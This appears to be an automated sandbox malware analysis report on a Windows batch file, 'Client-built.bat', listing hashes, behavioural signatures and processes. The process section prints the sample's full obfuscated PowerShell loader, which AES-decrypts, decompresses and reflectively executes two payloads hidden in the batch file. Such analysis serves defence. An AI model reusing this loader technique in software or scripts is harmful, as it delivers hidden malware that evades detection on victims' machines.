Analysis
max time kernel: 41s
max time network: 15s
platform: windows7_x64
resource: win7-20240319-en
resource tags: arch:x64, arch:x86, image:win7-20240319-en, locale:en-us, os:windows7-x64, system
submitted: 14-04-2024 15:44
Static task: static1
Behavioral task: behavioral1 (Sample: Client-built.bat; Resource: win7-20240319-en; 3 signatures; 60 seconds)
General
Target: Client-built.bat
Size: 1.6MB
MD5: 566c653ae6a704041aef596fce6d6a8c
SHA1: da35608bf372a6113d941817a96bc3a17de9ef69
SHA256: 950153a1ef5114d609ca8fa79a28374c1f24ae84a8f90ef0a21fb7914639b4e9
SHA512: 98662e33f746dce81efe530f6544bf0d83eff2ff35d72bf54e105ef6de121108a4aa28d6e417d3c8e1584a5c0165f78b180574eaa489f11d7cd617b6d31e01c2
SSDEEP: 24576:5fdhc8KmdqCxAN6Wzmom6E7SMVePybPyDJq2Tg60xTmDADhXX9wEvIslVYglu0TW:5FhcZmgs4DANHXvhXNVnEyx8f
Score: 1/10
Malware Config
Signatures
Suspicious behavior: EnumeratesProcesses (1 IoC)
  Process: powershell.exe (PID 2300)
Suspicious use of AdjustPrivilegeToken (1 IoC)
  Process: powershell.exe (PID 2300); Token: SeDebugPrivilege
Suspicious use of WriteProcessMemory (3 IoCs)
  Process: cmd.exe (PID 1620) wrote to memory of powershell.exe (PID 2300); the same event is recorded three times
Processes
Process: C:\Windows\system32\cmd.exe (PID 1620)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"
  Signatures: Suspicious use of WriteProcessMemory
Child process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2300, spawned by the cmd.exe process above)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rut3Nxs7NHGxRfDGW4AZiW/la3bsD/qGa57R1oLq3Jk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IMGBAJCtblcDTdjuAM5M1A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rYugK=New-Object System.IO.MemoryStream(,$param_var); $FsizC=New-Object System.IO.MemoryStream; $qQyLB=New-Object System.IO.Compression.GZipStream($rYugK, [IO.Compression.CompressionMode]::Decompress); $qQyLB.CopyTo($FsizC); $qQyLB.Dispose(); $rYugK.Dispose(); $FsizC.Dispose(); $FsizC.ToArray();}function execute_function($param_var,$param2_var){ $YdjZT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WGHne=$YdjZT.EntryPoint; $WGHne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$tUlfv=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Client-built.bat').Split([Environment]::NewLine);foreach ($opvFd in $tUlfv) { if ($opvFd.StartsWith(':: ')) { $vKkrO=$opvFd.Substring(3); break; }}$payloads_var=[string[]]$vKkrO.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken